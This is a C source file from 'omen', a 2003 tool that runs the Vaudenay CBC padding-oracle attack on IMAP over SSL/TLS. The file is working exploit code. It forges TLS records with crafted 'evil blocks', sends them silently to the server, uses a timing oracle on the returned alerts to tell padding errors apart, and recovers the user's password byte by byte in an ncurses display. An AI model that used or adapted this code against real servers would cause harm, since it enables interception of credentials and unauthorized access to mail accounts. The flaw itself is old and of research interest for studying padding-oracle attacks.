/*
 * omen - Attack of the Vau[02] CBC-PAD flaw with Imap over SSL/TLS
 *
 * Copyright (c) 2003 Martin Vuagnoux <martin@vuagnoux.com>
 *
 * omen  is free software; you can redistribute it and/or modify it under
 * the terms of the GNU General Public License as published by the Free
 * Software Foundation; either version 2, or (at your option) any later
 * version.
 *
 * omen  is distributed in the hope that it will be useful, but WITHOUT ANY
 * WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS
 * FOR A PARTICULAR PURPOSE.  See the GNU General Public License for more
 * details.
 *
 * You should have received a copy of the GNU General Public License along
 * with wavemon; see the file COPYING.  If not, write to the Free Software
 * Foundation, 59 Temple Place - Suite 330, Boston, MA 02111-1307, USA.
 */

#include <stdlib.h>
#include <unistd.h>
#include <string.h>
#include <ncurses.h>

#include "conf.h"
#include "proxy.h"
#include "oracle.h"
#include "cbc_sha_attack.h"


void print_passwd(struct cbcPadConf *conf)
{
  int i,j;
  /* user friendly passwd */
  wprintw(conf->pwWin, "\n\n");
  for (i=0;i<conf->nb_block;i++) {
    wattron(conf->pwWin, COLOR_PAIR(COLOR_WHITE));
    if (i == conf->current_block) {
      wattron(conf->pwWin, COLOR_PAIR(COLOR_YELLOW));
    }
    for(j=0;j<8;j++) {
      if (i*8+j == conf->current_block*8+conf->current_word) {
	wattron(conf->pwWin, A_BOLD);
	wattron(conf->pwWin, A_BLINK);
      }
      /* we print a "!" if the char is not printable ASCII char. Otherwise,
       * we have some problems to print the password :) Normally they are
       * SHA-1 Chars. So not important.
       */
      if ((conf->passwd[i*8+j] < 0x20) || conf->passwd[i*8+j] > 0x7e) 
	wprintw(conf->pwWin, "!");
      else
	wprintw(conf->pwWin, "%c", conf->passwd[i*8+j]);
      if (i*8+j == conf->current_block*8+conf->current_word) {
        wattroff(conf->pwWin, A_BOLD);
	wattroff(conf->pwWin, A_BLINK);
      }
    }
  }
  wprintw(conf->pwWin, "\n");
  wrefresh(conf->pwWin);
}

/* print user friendly the password in hexa */
void print_passwd_hexa(struct cbcPadConf *conf)
{
  int i,j;
  /* in debugWin we print the plaintext in hexa */
  wprintw(conf->debugWin, "Current Password in Hexa:\n");
  
  for (i=0;i<conf->nb_block;i++) {
    wattron(conf->debugWin, COLOR_PAIR(COLOR_WHITE));
    if (i == conf->current_block) {
      wattron(conf->debugWin, COLOR_PAIR(COLOR_YELLOW));
    }
    for(j=0;j<8;j++) {
      if (i*8+j == conf->current_block*8+conf->current_word) {
	wattron(conf->debugWin, A_BOLD);
      }
      wprintw(conf->debugWin, "%2x ", conf->passwd[i*8+j]);
      if (i*8+j == conf->current_block*8+conf->current_word) {
        wattroff(conf->debugWin, A_BOLD);

      }
   
    }
    wattron(conf->debugWin, COLOR_PAIR(COLOR_WHITE));
    wprintw(conf->debugWin,"\n");
  }
  wprintw(conf->debugWin, "\n");
  wrefresh(conf->debugWin);
}

int crack(struct cbcPadConf *conf)
{
  
  unsigned char temp_pkt[16+5];
  int i;
  int oracle;
  
  /* init temp_pkt */
  bzero(temp_pkt, 16+5);

  /* print passwd */
  print_passwd(conf);

  /* fill the header of the temp_pkt */
  temp_pkt[0] = 0x17; /* data */
  temp_pkt[1] = 0x03; /* TLS major */
  temp_pkt[2] = 0x01; /* TLS minor */
  temp_pkt[3] = 0x3f; /* size major */
  temp_pkt[4] = 0xf8; /* size minor */
  /* REM> if we but a size of 16B the return correct alert is not
   * bad_record_mac but decode_error, because the size of the sha-1
   * which is 20B is more than 16B. In fact we create the bigger packet
   * possible to have a longer sha-1 decryption. The max size is 16383B
   * so we use a multiple -> 0x3ff8 = 16368  
   */

  /* ui info */
  wprintw(conf->debugWin, "Testing %c (0x%x) ", conf->attack_word[0], conf->attack_word[0]);
  wrefresh(conf->debugWin);


  
  /* fill random(0) to random(current_word-1) */
  for(i=0;i<conf->current_word;i++)
    temp_pkt[5+i] = rand() %256;

  
  /* first attack (to discover a7) cf [Vau02]: CBC Padding: Security Flaw in TLS revisited.
   * r0, r1, r2, r3, r4, r5, r6, r7 = g^x7
   */
  if (conf->first_attack == 0) {
      temp_pkt[5+conf->current_word] = conf->pkt[5+(conf->current_block-1)*8 + conf->current_word] ^ conf->attack_word[0];
  }
  /* generic attack of the jth word. cf [Vau02]: CBC Padding: Security Flaw in TLS revisited. */
  else 
  {
    /* 1: build rj, ..., r7 where j=conf->current_word
     * 1: rk = ak ^ (7-j+1) ^ xk where k = j, ..., 7
     * 1: eg: r7 = a7 ^ 1 ^ x7
     */
    for(i=conf->current_word+1;i<8;i++) {
      temp_pkt[5+i] = conf->passwd[(conf->current_block)*8+i] ^ (7 - (conf->current_word+1) + 1) ^ conf->pkt[5+(conf->current_block-1)*8+i];
    }
    
    /* 2: build r
     * 2: r = r1, ..., rj-2, xj-1 ^ g ^ (7-j+1), rj, ..., r7
     * 2: eg: r6 = x6 ^ g ^ 1
     */
    temp_pkt[5+(conf->current_word)] = conf->pkt[5+(conf->current_block-1)*8+conf->current_word] ^ conf->attack_word[0] ^ (7 - (conf->current_word+1) + 1);
    

  }
  /* fill the second block (current_block) */
  for(i=0;i<8;i++)
    temp_pkt[5+8+i] = conf->pkt[5+conf->current_block*8+i];
    
  /* fill the real sended buffer conf->pkt */
  /* We create the bigger packet possible to make the sha decryption longer */
  bzero(conf->pkt, MAX_PKT_SIZE);
  /* header */
  memcpy(conf->pkt, temp_pkt, 5);

  /* garbage */
  for(i=5;i<16360+5;i++) 
    conf->pkt[i] = rand() % 256;

  /* two evil blocks */
  memcpy(conf->pkt+16360+5, temp_pkt+5, 16);

  /* fill conf->pkt_size (static) */
  conf->pkt_size = 16376+5;

  /* send silently to the server */
  pkt_send_server(conf);

  /* waiting for the signal oracle (ssldump patched) */
  // oracle_signal_init(conf);

  /* we receive the answer (ALERT pkt) */
  server_to_client(conf);

  /* parse the signal oracle (ssldump patched) */
  // oracle = oracle_signal(conf);

  /* oracle with a timing attack (param value) - No ssldump */
  oracle = oracle_timing(conf);
  /* Not determined type.. we recheck another time */
  if (oracle == 0) {
    wattron(conf->debugWin, A_BOLD);
    wattron(conf->debugWin, COLOR_PAIR(COLOR_BLUE));
    wprintw(conf->debugWin, "Recheck...\n\n");
    wattron(conf->debugWin, COLOR_PAIR(COLOR_BLUE));
    wattroff(conf->debugWin, A_BOLD);
    wrefresh(conf->debugWin);
    return 0;
  }
  
  /* bad_record_mac or decode_error! (good!) */
  if (oracle == 1) {
    conf->passwd[conf->current_block*8 + conf->current_word] = conf->attack_word[0];

    /* user friendly password */
    print_passwd(conf);

    if (conf->current_word == 0) {

      /* this is the end... */
      if (conf->current_block+1 == conf->nb_block) {
	/* print the hexa passwd for the last time */
	print_passwd_hexa(conf);

	wattron(conf->debugWin, COLOR_PAIR(COLOR_RED));
	wprintw(conf->debugWin, "decryption finished! PRESS CTRL-C to quit!\n");
	wrefresh(conf->debugWin);
	/* wait for a signal (CTRL-C) */
	pause();
	exit(EXIT_SUCCESS);
      }
      conf->current_block++;
      conf->first_attack = 0;
      conf->current_word = 7;
      conf->attack_word[0] = 0x00;
    }
    else {
      /* first attack no decrement current_word */
      if (conf->first_attack == 0) 
	conf->first_attack = 1;
      conf->current_word--;
      conf->attack_word[0] = 0x0;
    }
    return 1;
  }
  
  /* decryption_failed (check another attack_word) */
  else if (oracle == 2) {
    print_passwd(conf);
    /* this is the end... */
    if (conf->current_block == conf->nb_block) {
      wprintw(conf->debugWin, "decryption finished! press CTRL-C to exit.\n");
      wrefresh(conf->debugWin);
      /* wait for a signal (CTRL-C) */
      pause();
      exit(EXIT_SUCCESS);
    }
    else
      conf->attack_word[0]++;
    return 1;
  }
  
  /* error */
  else {
    wprintw(conf->debugWin, "Error ?! recheck the same attack word\n");
    wrefresh(conf->debugWin);
    return 0;
  }
  
  /* never go there normally */
  return 0;
}

